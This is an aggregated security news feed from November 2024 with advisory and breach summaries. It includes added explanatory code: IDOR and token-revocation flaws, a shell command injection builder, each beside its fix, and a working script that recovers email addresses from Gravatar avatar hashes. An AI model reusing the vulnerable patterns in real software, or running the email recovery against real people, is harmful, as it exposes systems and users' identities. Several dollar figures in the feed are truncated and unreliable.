https://blog.rapid7.com/2024/11/12/patch-tuesday-november-2024/

Microsoft Patch Tuesday, November 2024 Edition
Microsoft today released updates to plug at least 89 security holes in its Windows operating systems and other software. November's patch batch includes fixes for two zero-day vulnerabilities that are already being exploited by attackers, as well as two other flaws that were publicly disclosed prior to today.
https://krebsonsecurity.com/2024/11/microsoft-patch-tuesday-november-2024-edition/

Weekly Detection Rule (YARA and Snort) Information – Week 2, November 2024
The following is the information on YARA and Snort rules (week 2, November 2024) collected and shared by the AhnLab TIP service. 3 YARA Rules (detection name / description / source): MAL_Sophos_XG_Pygmy_Goat_AES_Key: detects Pygmy Goat, a native x86-32 ELF shared object that was discovered on Sophos XG firewall devices, providing backdoor access to the device. This […] The post Weekly Detection Rule (YARA and Snort) Information – Week 2, November 2024 appeared first on ASEC.
https://asec.ahnlab.com/en/84346/

LodaRAT: Established Malware, New Victim Patterns
Rapid7 has observed an ongoing malware campaign involving a new version of LodaRAT. This version possesses the ability to steal cookies and passwords from Microsoft Edge and Brave.
https://blog.rapid7.com/2024/11/12/lodarat-established-malware-new-victim-patterns/

6 Principles of Operational Technology Cybersecurity released by joint NSA initiative
Today’s critical infrastructure organizations rely on operational technology (OT) to help control and manage the systems and processes required to keep critical services to the public running. However, due to the highly integrated nature of OT deployments, cybersecurity has become a primary concern. On October 2, 2024, the NSA (National Security Agency) released a new […] The post 6 Principles of Operational Technology Cybersecurity released by joint NSA initiative appeared first on Security Intelligence.
https://securityintelligence.com/posts/6-principles-operational-technology-cybersecurity-nsa-initiative/

20 Best Cybersecurity Website Designs
This week in cybersecurity from the editors at Cybercrime Magazine –Read the Full Story in CyberOptik Sausalito, Calif. – Nov. 12, 2024 The best cybersecurity websites effectively communicate trust, expertise, and cutting-edge technology through their design and functionality, making them essential components of a cybersecurity company's success, The post 20 Best Cybersecurity Website Designs appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/20-best-cybersecurity-website-designs/

ModeLeak: Privilege Escalation to LLM Model Exfiltration in Vertex AI
New research reveals two vulnerabilities in Google's Vertex AI that may lead to privilege escalation or data theft through custom jobs or malicious models. The post ModeLeak: Privilege Escalation to LLM Model Exfiltration in Vertex AI appeared first on Unit 42.
https://unit42.paloaltonetworks.com/privilege-escalation-llm-model-exfil-vertex-ai/

FortiOS - Improper authentication in fgfmd
An improper authentication vulnerability [CWE-287] in FortiManager, FortiOS, FortiPAM, FortiPortal, FortiProxy and FortiSwitchManager fgfmd daemon may allow an unauthenticated attacker to inject (but not receive) packets in tunnels established between a FortiManager and the targeted device. Revised on 2024-11-15 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-032

Heap buffer overflow in httpd
A heap-based buffer overflow vulnerability [CWE-122] in the FortiManager and FortiAnalyzer httpd daemon may allow a remote unauthenticated attacker to execute arbitrary code or commands as a low-privileged user via specifically crafted requests. Revised on 2024-11-15 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-125

Lack of capacity to filter logs by administrator access
An exposure of personal information to an unauthorized actor [CWE-359] in FortiManager, FortiAnalyzer & FortiAnalyzer-BigData may allow a privileged attacker with administrative read permissions to read event logs of another ADOM via crafted HTTP or HTTPS requests. Revised on 2024-11-14 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-23-267

Online Installer DLL Hijacking
An untrusted search path vulnerability [CWE-426] in FortiClient Windows may allow an attacker to run arbitrary code via DLL hijacking and social engineering. Revised on 2024-11-13 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-205

Arbitrary file read in administrative interface
An improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability [CWE-22] in FortiManager, FortiAnalyzer & FortiAnalyzer-BigData may allow a privileged attacker to read arbitrary files from the underlying system via crafted HTTP or HTTPS requests. Revised on 2024-11-12 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-115

Exposure of password hashes to read-only admin
An exposure of sensitive system information to an unauthorized control sphere vulnerability [CWE-497] in FortiWeb may allow an authenticated attacker to access the encrypted passwords of other administrators via the "Log Access Event" logs page. Revised on 2024-11-12 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-180

FortiClientMacOS - Missing signature verification
An improper verification of cryptographic signature vulnerability [CWE-347] in FortiClient MacOS may allow a local authenticated attacker to swap the installer with a malicious package via a race condition during the installation process. Revised on 2024-11-12 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-022

FortiOS - SSLVPN session hijacking using SAML authentication
A session fixation vulnerability [CWE-384] in FortiOS may allow an unauthenticated attacker to hijack a user session via a phishing SAML authentication link. Revised on 2024-11-12 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-23-475

Insecure Direct Object Reference over API endpoints
An authorization bypass through user-controlled key vulnerability [CWE-639] in the FortiPortal administrative interface may allow an authenticated attacker to interact with resources of other organizations via HTTP or HTTPS requests. Revised on 2024-11-12 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-23-448

Named Pipes Improper Access Control
An authentication bypass using an alternate path or channel vulnerability [CWE-288] in FortiClient (Windows) may allow a low-privilege attacker to execute arbitrary code with high privilege via spoofed named pipe messages. Revised on 2024-11-12 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-199

Gartner report: How SBOMs improve security and compliance in the software supply chain
As software supply chain risks rise, regulatory authorities are increasingly requiring organizations to adopt software bills of materials (SBOMs) for security and compliance.
https://www.sonatype.com/blog/gartner-report-how-sboms-improve-security-and-compliance-in-the-software-supply-chain

DoD Zero Trust Strategy proves security benchmark years ahead of schedule with Microsoft collaboration
The Navy implementation scored a 100 percent success rate, meeting DoD requirements on all 91 Target-Level activities tested. The post DoD Zero Trust Strategy proves security benchmark years ahead of schedule with Microsoft collaboration appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/11/11/dod-zero-trust-strategy-proves-security-benchmark-years-ahead-of-schedule-with-microsoft-collaboration/

Ransomware Works And Is Here To Stay
This week in cybersecurity from the editors at Cybercrime Magazine. Read the Full Story in Mitnick Security. Sausalito, Calif., Nov. 11, 2024. Kevin Mitnick, the world's most famous hacker, passed away on Jul. 16, 2023, but his namesake blog is alive and kicking. A recent Mitnick Security post on The post Ransomware Works And Is Here To Stay appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/ransomware-works-and-is-here-to-stay/

Ymir: new stealthy ransomware in the wild
Kaspersky GERT experts have discovered the new Ymir ransomware in Colombia; it uses RustyStealer for initial access and the qTox client to communicate with its victims.
https://securelist.com/new-ymir-ransomware-found-in-colombia/114493/

Hot Topic - 56,904,909 breached accounts
In October 2024, retailer Hot Topic suffered a data breach that exposed 57 million unique email addresses. The impacted data also included physical addresses, phone numbers, purchases, genders, dates of birth and partial credit data containing card type, expiry and last 4 digits.
https://haveibeenpwned.com/PwnedWebsites#HotTopic

Change of Recovery Disruption Techniques in Ransomware
Overview. Ransomware attacks are still on the rise in 2024. Threat actors continue to launch ransomware attacks because victims infected with ransomware often pay a ransom to recover their data, allowing the attackers to profit significantly. Threat actors maintain their anonymity by demanding ransom payments in cryptocurrency, making it difficult for law enforcement […] The post Change of Recovery Disruption Techniques in Ransomware appeared first on ASEC.
https://asec.ahnlab.com/en/84415/

FBI: Spike in Hacked Police Emails, Fake Subpoenas
The Federal Bureau of Investigation (FBI) is urging police departments and governments worldwide to beef up security around their email systems, citing a recent increase in cybercriminal services that use hacked police email accounts to send unauthorized subpoenas and customer data requests to U.S.-based technology companies.
https://krebsonsecurity.com/2024/11/fbi-spike-in-hacked-police-emails-fake-subpoenas/

Issue with data.all (Multiple CVEs)
Publication Date: 2024/11/8 4:00 PM PDT. Data.all is an open source development framework to help customers build a data marketplace on AWS. We have identified the following issues within data.all versions 1.0.0 through 2.6.0. On November 8, 2024, we released a fix and recommend customers upgrade to version 2.6.1 or later and ensure any forked or derivative code is patched to incorporate the new fixes. CVE-2024-52311 relates to an issue where data.all does not invalidate the authentication token upon user logout. CVE-2024-52312 relates to an issue where data.all authenticated users can perform restricted operations against DataSets and Environments. CVE-2024-52313 relates to an issue where data.all authenticated users can obtain incorrect object-level authorizations. CVE-2024-52314...
https://aws.amazon.com/security/security-bulletins/AWS-2024-013/
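The FortiPortal advisory above (CWE-639, access to other organizations' resources through a caller-supplied key) and two of the data.all issues (a token that stays valid after logout, and incorrect object-level authorization) are the same two bug classes. The following added example models both generically; it is not code from FortiPortal, data.all or AWS, and the API shape, the "organization" ownership field, the token store and the resource table are constructed assumptions. Each weakness is shown beside its fix: the object lookup is bound to the caller's organization, and logout revokes the token server-side instead of only clearing the client's cookie.

```python
"""Object-level authorization (CWE-639) and logout that does not revoke tokens.

Added example modelling the bug classes in the FortiPortal and data.all
bulletins; not either product's code. Resource ids, organizations and
payloads below are constructed.
"""
import secrets
import time


class Api:
    def __init__(self):
        # token -> (user, organization, expiry epoch seconds)
        self._tokens = {}
        # constructed resource table: id -> (owning organization, payload)
        self._resources = {
            "ds-101": ("org-a", "org-a customer data set"),
            "ds-202": ("org-b", "org-b billing environment"),
        }

    # --- authentication ---------------------------------------------------
    def login(self, user: str, org: str, ttl_s: int = 3600) -> str:
        tok = secrets.token_urlsafe(32)
        self._tokens[tok] = (user, org, time.time() + ttl_s)
        return tok

    def logout_cookie_only(self, token: str) -> None:
        """Vulnerable pattern: the client is told to drop its cookie but the
        server keeps honouring the token, so a captured token still works."""
        return None

    def logout_revoking(self, token: str) -> None:
        """Hardened: the server forgets the token, so later use fails."""
        self._tokens.pop(token, None)

    def _principal(self, token: str):
        rec = self._tokens.get(token)
        if rec is None or rec[2] < time.time():
            raise PermissionError("invalid or expired token")
        return rec

    # --- object access ----------------------------------------------------
    def get_resource_idor(self, token: str, resource_id: str) -> str:
        """Vulnerable: authenticates the caller, then fetches whatever object
        the caller-supplied id names (CWE-639)."""
        self._principal(token)
        return self._resources[resource_id][1]

    def get_resource_checked(self, token: str, resource_id: str) -> str:
        """Hardened: the object's owning organization must equal the caller's.
        Missing and foreign objects return the same error so ids cannot be
        enumerated by telling 'not found' from 'forbidden'."""
        _, caller_org, _ = self._principal(token)
        rec = self._resources.get(resource_id)
        if rec is None or rec[0] != caller_org:
            raise PermissionError("no such resource")
        return rec[1]


def demo() -> dict:
    """Exercises both weaknesses and both fixes as org-a's user 'alice'."""
    api = Api()
    tok_a = api.login("alice", "org-a")

    idor_leak = api.get_resource_idor(tok_a, "ds-202")          # org-b data, no ownership check
    try:
        api.get_resource_checked(tok_a, "ds-202")
        checked_other = "leaked"
    except PermissionError:
        checked_other = "denied"
    checked_own = api.get_resource_checked(tok_a, "ds-101")

    api.logout_cookie_only(tok_a)
    usable_after_cookie_logout = api.get_resource_checked(tok_a, "ds-101") == checked_own
    api.logout_revoking(tok_a)
    try:
        api.get_resource_checked(tok_a, "ds-101")
        usable_after_revocation = True
    except PermissionError:
        usable_after_revocation = False

    return {
        "idor_leaks_other_org": idor_leak,
        "checked_other_org": checked_other,
        "checked_own": checked_own,
        "token_usable_after_cookie_only_logout": usable_after_cookie_logout,
        "token_usable_after_revocation": usable_after_revocation,
    }
```

The ownership check belongs in the data-access layer, applied to every path that can name an object (list, read, update, delete, and any batch or export endpoint), because a check that exists only on the main read handler is exactly the gap these advisories describe. For tokens that are signed and stateless, revocation needs a server-side denylist keyed on the token id until its natural expiry.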

6 Top Benefits of Managed Cloud Security
Originally published by Tamnoon. As businesses continue migrating to the cloud and expanding their cloud footprint, scaling remediation of misconfigurations and reducing cloud threat exposure becomes a continuous battle for SecOps teams. Managed cloud security services offer the much-needed solution for cloud security teams; what MDR is to SOC teams, managed cloud security services are to security engineers. In this post, we'll explore six key benefits of managed cloud security in 2024, and wh...
https://cloudsecurityalliance.org/articles/6-top-benefits-of-managed-cloud-security

Metasploit Wrap-Up: 11/08/2024
This release of Metasploit Framework has added exciting new features such as new payloads that target the RISC-V architecture. Learn more!
https://blog.rapid7.com/2024/11/08/metasploit-wrap-up-11-08-2024/

Mind the Gap: How Surface Command Tackles Asset Visibility in Attack Surface Management
By establishing visibility of the attack surface and implementing management processes to prioritize, validate, and mobilize responses, security teams can reduce exposures exploited by malicious threat actors.
https://blog.rapid7.com/2024/11/08/mind-the-gap-how-surface-command-tackles-asset-visibility-in-attack-surface-management/

SpyAgent malware targets crypto wallets by stealing screenshots
A new Android malware strain known as SpyAgent is making the rounds — and stealing screenshots as it goes. Using optical character recognition (OCR) technology, the malware is after cryptocurrency recovery phrases often stored in screenshots on user devices. Here’s how to dodge the bullet. Attackers shooting their (screen) shot Attacks start — as always […] The post SpyAgent malware targets crypto wallets by stealing screenshots appeared first on Security Intelligence.
https://securityintelligence.com/articles/spyagent-malware-targets-crypto-wallets-stealing-screenshots/

QSC: A multi-plugin framework used by CloudComputating group in cyberespionage campaigns
Kaspersky shares details on QSC modular cyberespionage framework, which appears to be linked to CloudComputating group campaigns.
https://securelist.com/cloudcomputating-qsc-framework/114438/

Cisco URWB Access Point Command Injection Vulnerability (CVE-2024-20418)
What is the Vulnerability? A maximum severity (CVSS score 10.0) vulnerability in the web-based management interface of Cisco Unified Industrial Wireless Software for Cisco Ultra-Reliable Wireless Backhaul (URWB) Access Points could allow an unauthenticated, remote attacker to perform command injection attacks with root privileges on the underlying operating system. This vulnerability is due to improper validation of input to the web-based management interface. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. The FortiGuard Threat Research Team is actively monitoring the vulnerability and will update this report with any new developments. What is the recommended Mitigation? Cisco has released security...
https://fortiguard.fortinet.com/threat-signal-report/5574
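The bug class named above, unauthenticated command injection through a management interface that passes request input to a root shell, as an added generic example. This is not Cisco's code and says nothing about how CVE-2024-20418 is triggered; the "ping" diagnostic endpoint and its `target` parameter are assumptions chosen to make the pattern concrete. The vulnerable builder interpolates the parameter into a shell command string; the hardened one validates the value against a strict allow-list (IP literal or RFC-style hostname) and passes it as its own argv element with no shell involved.

```python
"""OS command injection in a web management handler: vulnerable and hardened.

Added example, not Cisco's code. The diagnostic endpoint and parameter are
constructed to illustrate improper input validation reaching a shell.
"""
import ipaddress
import re
import shlex
import subprocess

# One DNS label: alnum, optional inner hyphens, 1..63 chars; labels joined by dots.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*$")


def build_command_vulnerable(target: str) -> str:
    """Builds the string handed to a shell. Any shell metacharacter in
    `target` changes what gets executed."""
    return f"ping -c 1 {target}"


def shell_tokens(command: str) -> list:
    """Tokenises `command` the way a POSIX shell would, with ';' as a
    separate operator token, to show what the vulnerable string becomes."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    return list(lex)


def validate_target(target: str) -> str:
    """Accepts an IPv4/IPv6 literal or a well-formed hostname; rejects
    everything else (spaces, ';', '$(', backticks, leading '-', ...)."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if len(target) <= 253 and HOSTNAME_RE.match(target):
        return target
    raise ValueError(f"rejected target: {target!r}")


def build_command_hardened(target: str) -> list:
    """argv list for subprocess without a shell: each element is exactly one
    argument, so metacharacters are passed literally to ping, which rejects them.
    Validation happens first, so they never get that far."""
    return ["ping", "-c", "1", validate_target(target)]


def rejects(target: str) -> bool:
    """True if the hardened path refuses the value."""
    try:
        build_command_hardened(target)
        return False
    except ValueError:
        return True


def run_hardened(target: str) -> int:
    """Runs the diagnostic without a shell; returns ping's exit status.
    Needs network access, so the self-test does not call it."""
    return subprocess.run(build_command_hardened(target), check=False, timeout=10).returncode
```

The allow-list is the real control; argv passing is defence in depth against a validator bug. Running the management daemon as an unprivileged user and granting only the needed capability (for ping, CAP_NET_RAW) would turn a successful injection into a far smaller problem than the root shell the advisory describes.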

Microsoft Multiple Actively Exploited Vulnerabilities
What are the Vulnerabilities? Threat actors are exploiting multiple zero-day vulnerabilities that were recently disclosed in the Microsoft Security Updates for August 2024. The six actively exploited zero-day vulnerabilities were also added to CISA's Known Exploited Vulnerabilities (KEV) catalog after the disclosure. [August 2024 Security Updates - Release Notes - Microsoft]
CVE-2024-38189: Microsoft Project Remote Code Execution Vulnerability
CVE-2024-38178: Microsoft Windows Scripting Engine Memory Corruption Vulnerability
CVE-2024-38213: Microsoft Windows SmartScreen Security Feature Bypass Vulnerability
CVE-2024-38193: Microsoft Windows Ancillary Function Driver for WinSock Privilege Escalation Vulnerability
CVE-2024-38106: Microsoft Windows Kernel Privilege Escalation Vulnerability
CVE-2024-38107:...
https://fortiguard.fortinet.com/threat-signal-report/5507

Digital Danger: How Cyberattacks Put Patients at Risk

https://www.proofpoint.com/us/newsroom/news/digital-danger-how-cyberattacks-put-patients-risk

More value, less risk: How to implement generative AI across the organization securely and responsibly
The technology landscape is undergoing a massive transformation, and AI is at the center of this change. The post More value, less risk: How to implement generative AI across the organization securely and responsibly appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/microsoft-cloud/blog/2024/11/04/more-value-less-risk-how-to-implement-generative-ai-across-the-organization-securely-and-responsibly/

Android Malware & Security Issue 1st Week of November, 2024
ASEC Blog publishes "Android Malware & Security Issue 1st Week of November, 2024". The post Android Malware & Security Issue 1st Week of November, 2024 appeared first on ASEC.
https://asec.ahnlab.com/en/84283/

Cybersecurity Growth Stock to Buy During the Latest Market Sell-Off
This week in cybersecurity from the editors at Cybercrime Magazine. Read the Full Story in The Motley Fool. Sausalito, Calif., Nov. 7, 2024. The Motley Fool reports that Tenable (NASDAQ: TENB) generated 7.1 million in revenue during the third quarter of 2024, a 13 percent The post Cybersecurity Growth Stock to Buy During the Latest Market Sell-Off appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/cybersecurity-growth-stock-to-buy-during-the-latest-market-sell-off/

Exploring DORA: How to manage ICT incidents and minimize cyber threat risks
As cybersecurity breaches continue to rise globally, institutions handling sensitive information are particularly vulnerable. In 2024, the average cost of a data breach in the financial sector reached .08 million, making it the second hardest hit after healthcare, according to IBM’s 2024 Cost of a Data Breach report. This underscores the need for robust IT […] The post Exploring DORA: How to manage ICT incidents and minimize cyber threat risks appeared first on Security Intelligence.
https://securityintelligence.com/posts/exploring-dora-how-to-manage-ict-incidents/

Silent Skimmer Gets Loud (Again)
We discuss a new campaign from the cybercrime group behind Silent Skimmer, showcasing the exploit of Telerik UI vulnerabilities and malware like RingQ loader. The post Silent Skimmer Gets Loud (Again) appeared first on Unit 42.
https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/

Earth 2 - 420,961 breached accounts
In October 2024, 421k unique email addresses from the virtual earth game Earth 2 were derived from embedded Gravatar images. The addresses appeared alongside player usernames. The root cause was how Gravatar exposes avatar links as MD5 hashes of the email address within consuming services, a feature Earth 2 advised has since been disabled on its platform. This incident did not expose any further personal information, passwords or financial data.
https://haveibeenpwned.com/PwnedWebsites#Earth2
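Why an avatar link leaks the address behind it, as an added example (not Earth 2's or Gravatar's code). Gravatar identifies an avatar by the MD5 of the trimmed, lower-cased email address, so a page that embeds avatar URLs next to usernames is publishing a hash of every member's email. MD5 is fast and email addresses are low-entropy, so hashing a candidate list (leaked address dumps, username@popular-domain combinations) and comparing recovers a large share of them. The sample page and candidate list below are constructed.

```python
"""Deriving email addresses from Gravatar avatar URLs by hash-and-compare.

Added example; the HTML fragment and candidate addresses are constructed.
"""
import hashlib
import re

GRAVATAR_RE = re.compile(r"gravatar\.com/avatar/([0-9a-f]{32})", re.I)


def gravatar_hash(email: str) -> str:
    """Gravatar's documented normalisation: trim whitespace, lower-case, MD5."""
    return hashlib.md5(email.strip().lower().encode("utf-8")).hexdigest()


def extract_hashes(html: str) -> list:
    """Pulls the 32-hex avatar hashes out of a page (deduplicated, in order)."""
    seen, out = set(), []
    for h in GRAVATAR_RE.findall(html):
        h = h.lower()
        if h not in seen:
            seen.add(h)
            out.append(h)
    return out


def recover_emails(hashes, candidates) -> dict:
    """Maps each hash that a candidate address produces to that address.
    Stops early once every hash has been matched."""
    wanted = set(hashes)
    found = {}
    for cand in candidates:
        h = gravatar_hash(cand)
        if h in wanted and h not in found:
            found[h] = cand.strip().lower()
            if len(found) == len(wanted):
                break
    return found


# Constructed sample page: two player cards with Gravatar-style avatar links.
SAMPLE_HTML = f"""
<div class="player"><img src="https://www.gravatar.com/avatar/{gravatar_hash('Alice.Example@example.com')}?s=64"> alice_e</div>
<div class="player"><img src="https://www.gravatar.com/avatar/{gravatar_hash('bob@example.org')}?s=64"> bob_o</div>
"""

# Constructed candidate list; a real one is millions of entries.
CANDIDATES = ["carol@example.net", "bob@example.org", "alice.example@example.com"]


def demo() -> dict:
    """Runs extraction and recovery against the constructed page."""
    return recover_emails(extract_hashes(SAMPLE_HTML), CANDIDATES)
```

The lesson generalises beyond MD5: a deterministic hash of a low-entropy public identifier is not a secret, whatever the hash function, because the attacker hashes guesses rather than inverting anything. The fix that actually works is to keep the hash off the client, for example by fetching avatars server-side and serving them under an opaque per-user id.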

Unlocking Engagement with Employee Feedback

https://www.hackerone.com/culture-and-talent/unlocking-engagement-employee-feedback

Optimizing efficiency and reducing waste in open source software management
As the use of open source software (OSS) continues to grow, so do the challenges around maintaining security and efficiency in software dependency management.
https://www.sonatype.com/blog/optimizing-efficiency-and-reducing-waste-in-open-source-software-management

How an Improper Access Control Vulnerability Led to Account Theft in One Click
Improper access control is the #3 most common security vulnerability. Learn what improper access control is, its impacts, and how to prevent it.
https://www.hackerone.com/vulnerability-management/improper-access-control-deep-dive

Zero Trust Workshop: Advance your knowledge with an online resource
As part of Microsoft's ongoing efforts to support security modernization and the Zero Trust principles, we've launched Zero Trust Workshop, an online self-service resource. Read our latest blog post for details. The post Zero Trust Workshop: Advance your knowledge with an online resource appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/11/06/zero-trust-workshop-advance-your-knowledge-with-an-online-resource/

Ransom & Dark Web Issues Week 1, November 2024
ASEC Blog publishes Ransom & Dark Web Issues Week 1, November 2024. Topics covered: pro-Russian hacktivist NoName05716 carried out DDoS attacks on several South Korean institutions; user account information of Saudi Arabian government agencies was leaked on BreachForums; new dedicated leak sites of the ransomware gang HellDown. The post Ransom & Dark Web Issues Week 1, November 2024 appeared first on ASEC.
https://asec.ahnlab.com/en/84254/

Distribution of LummaC2 Infostealer Based on Legitimate Programs
LummaC2 is an infostealer actively being distributed disguised as illegal software such as cracks, and its distribution and creation methods are changing continuously. It has recently been distributed by being inserted into legitimate programs, so caution is needed. [Figure 1. Malware distribution page examples] When LummaC2 is executed, sensitive information such […] The post Distribution of LummaC2 Infostealer Based on Legitimate Programs appeared first on ASEC.
https://asec.ahnlab.com/en/84556/

What Telegram's recent policy shift means for cyber crime
Since its launch in August 2013, Telegram has become the go-to messaging app for privacy-focused users. To start using the app, users can sign up using either their real phone number or an anonymous number purchased from the Fragment blockchain marketplace. In the case of the latter, Telegram cannot be linked to the user’s real […] The post What Telegram's recent policy shift means for cyber crime appeared first on Security Intelligence.
https://securityintelligence.com/articles/what-telegrams-recent-policy-shift-means-for-cyber-crime/

25 Boardroom Cybersecurity Facts, Figures, Predictions, and Statistics
This week in cybersecurity from the editors at Cybercrime Magazine. Download the Report from Secureworks. Sausalito, Calif., Nov. 6, 2024. Cybersecurity Ventures predicts that the global cost of cybercrime will reach .5 trillion USD in 2024. Knowledge is the first and best defense in The post 25 Boardroom Cybersecurity Facts, Figures, Predictions, and Statistics appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/25-boardroom-cybersecurity-facts-figures-predictions-and-statistics/

Guidance for brands to help advertising partners counter malvertising
Advice to make it harder for cyber criminals to deliver malicious advertising, and reduce the risk of cyber-facilitated fraud.
https://www.ncsc.gov.uk/guidance/guidance-brands-advertising-partners-counter-malvertising

New SteelFox Trojan mimics software activators, stealing sensitive data and mining cryptocurrency
Kaspersky experts have discovered a new SteelFox Trojan that mimics popular software like Foxit PDF Editor and JetBrains to spread a stealer-and-miner bundle.
https://securelist.com/steelfox-trojan-drops-stealer-and-miner/114414/

Dennis Kirk - 1,356,026 breached accounts
In October 2024, almost 20GB of data containing 1.3M unique email addresses from motorcycle supplies store Dennis Kirk was circulated. Dating back to September 2021, the data also contained purchases from the online store along with customer names, phone numbers and postcodes. Dennis Kirk did not respond to multiple attempts to make contact about the breach. The data was provided to HIBP by a source who requested it be attributed to "IntelBroker, almighty444 & EnergyWeaponUser".
https://haveibeenpwned.com/PwnedWebsites#DennisKirk

Canadian Man Arrested in Snowflake Data Extortions
A 26-year-old man in Ontario, Canada has been arrested for allegedly stealing data from and extorting more than 160 companies that used the cloud data service Snowflake. On October 30, Canadian authorities arrested Alexander Moucka, a.k.a. Connor Riley Moucka of Kitchener, Ontario, on a provisional arrest warrant from the United States. Bloomberg first reported Moucka's alleged ties to the Snowflake hacks on Monday. At the end of 2023, malicious hackers learned that many large companies had uploaded huge volumes of sensitive customer data to Snowflake accounts that were protected with little more than a username and password (no multi-factor authentication required). After scouring darknet markets for stolen Snowflake account credentials, the hackers began raiding the data storage repositories...
https://krebsonsecurity.com/2024/11/canadian-man-arrested-in-snowflake-data-extortions/

How an Information Disclosure Vulnerability Led to Critical Data Exposure
Information disclosure is the #2 most common security vulnerability. Learn what information disclosure is, its impacts, and how to prevent it.
https://www.hackerone.com/vulnerability-management/information-disclosure-deep-dive

Skills shortage directly tied to financial loss in data breaches
The cybersecurity skills gap continues to widen, with serious consequences for organizations worldwide. According to IBM’s 2024 Cost Of A Data Breach Report, more than half of breached organizations now face severe security staffing shortages, a whopping 26.2% increase from the previous year. And that’s expensive. This skills deficit adds an average of .76 million in […] The post Skills shortage directly tied to financial loss in data breaches appeared first on Security Intelligence.
https://securityintelligence.com/articles/skills-shortage-directly-tied-to-financial-loss-in-data-breaches/

Altenen - 1,267,701 breached accounts
In June 2022, the malicious "carding" (referring to credit card fraud) website Altenen suffered a data breach that was later redistributed as part of a larger corpus of data. The data included 1.3M unique email addresses, usernames, bcrypt password hashes and cryptocurrency wallet addresses.
https://haveibeenpwned.com/PwnedWebsites#Altenen

Automatically Detecting DNS Hijacking in Passive DNS
Explore how we detect DNS hijacking by analyzing millions of DNS records daily, using machine learning to identify redirect attempts to malicious servers. The post Automatically Detecting DNS Hijacking in Passive DNS appeared first on Unit 42.
https://unit42.paloaltonetworks.com/detect-dns-hijacking-passive-dns/

Securing your software supply chain with CISA's new SBOM guidance
With new and increasing cyber threats abound, navigating global software regulations and staying informed and compliant can seem like an unending task. To help mitigate risks within the software applications organizations use every day, many are increasingly looking to the strategic adoption of software bills of materials (SBOMs) as an effective way to maintain compliance and better secure their software supply chain. An SBOM lists all packages and libraries in an application, including all components' dependencies. This enhanced visibility into what's in a piece of software makes it easier to identify vulnerabilities and license issues, as well as manage risk from open source components.
https://www.sonatype.com/blog/securing-your-software-supply-chain-with-cisas-new-sbom-guidance

How a Cross-Site Scripting Vulnerability Led to Account Takeover
Cross-site scripting (XSS) is the number one most common security vulnerability. Learn what XSS is, its impacts, and how to prevent it.
https://www.hackerone.com/vulnerability-management/xss-deep-dive

Gartner Report: How to Respond to the Threat Landscape in a Volatile, Complex and Ambiguous World
Refine your cybersecurity strategies to navigate the challenges of a VUCA (volatility, uncertainty, complexity, and ambiguity) environment.
https://www.sonatype.com/blog/gartner-report-how-to-respond-to-the-threat-landscape-in-a-volatile-complex-and-ambiguous-world

How Microsoft Defender for Office 365 innovated to address QR code phishing attacks
This blog examines the impact of QR code phishing campaigns and the innovative features of Microsoft Defender for Office 365 that help combat evolving cyberthreats. The post How Microsoft Defender for Office 365 innovated to address QR code phishing attacks appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/11/04/how-microsoft-defender-for-office-365-innovated-to-address-qr-code-phishing-attacks/

How to Reduce Risk From Developer Permissions Sprawl
Get steps to prevent risky permissions sprawl in your SDLC. 
https://www.legitsecurity.com/blog/reduce-risk-from-developer-permissions-sprawl

Z-lib - 9,737,374 breached accounts
In June 2024, almost 10M user records from Z-lib were discovered exposed online. Now defunct, Z-lib was a malicious clone of Z-Library, a well-known shadow online platform for pirating books and academic papers. The exposed data included usernames, email addresses, countries of residence, Bitcoin and Monero cryptocurrency wallet addresses, purchases and bcrypt password hashes.
https://haveibeenpwned.com/PwnedWebsites#ZLib

TA Phone Home: EDR Evasion Testing Reveals Extortion Actor's Toolkit
A threat actor attempted to use an AV/EDR bypass tool in an extortion attempt. Instead, the tool provided Unit 42 insight into the threat actor. The post TA Phone Home: EDR Evasion Testing Reveals Extortion Actor's Toolkit appeared first on Unit 42.
https://unit42.paloaltonetworks.com/edr-bypass-extortion-attempt-thwarted/

Booking.com Phishers May Leave You With Reservations
A number of cybercriminal innovations are making it easier for scammers to cash in on your upcoming travel plans. This story examines a recent spear-phishing campaign that ensued when a California hotel had its booking.com credentials stolen. We'll also explore an array of cybercrime services aimed at phishers who target hotels that rely on the world's most visited travel website.
https://krebsonsecurity.com/2024/11/booking-com-phishers-may-leave-you-with-reservations/

How a Business Logic Vulnerability Led to Unlimited Discount Redemption
Learn about the impact, severity, and a real-world example of business logic vulnerabilities.
https://www.hackerone.com/vulnerability-management/stripe-business-logic-error-bug

Enhance security with the Sonatype Lifecycle and GitLab Ultimate integration
For an organization to place greater emphasis on software supply chain security, seamless integrations that enhance visibility and streamline workflows remain essential. Sonatype is thrilled to unveil an enhanced integration between Sonatype Lifecycle and GitLab Ultimate, which offers comprehensive vulnerability insights directly within GitLab's native environment.
https://www.sonatype.com/blog/enhance-security-with-the-sonatype-lifecycle-and-gitlab-ultimate-integration

From Naptime to Big Sleep: Using Large Language Models To Catch Vulnerabilities In Real-World Code
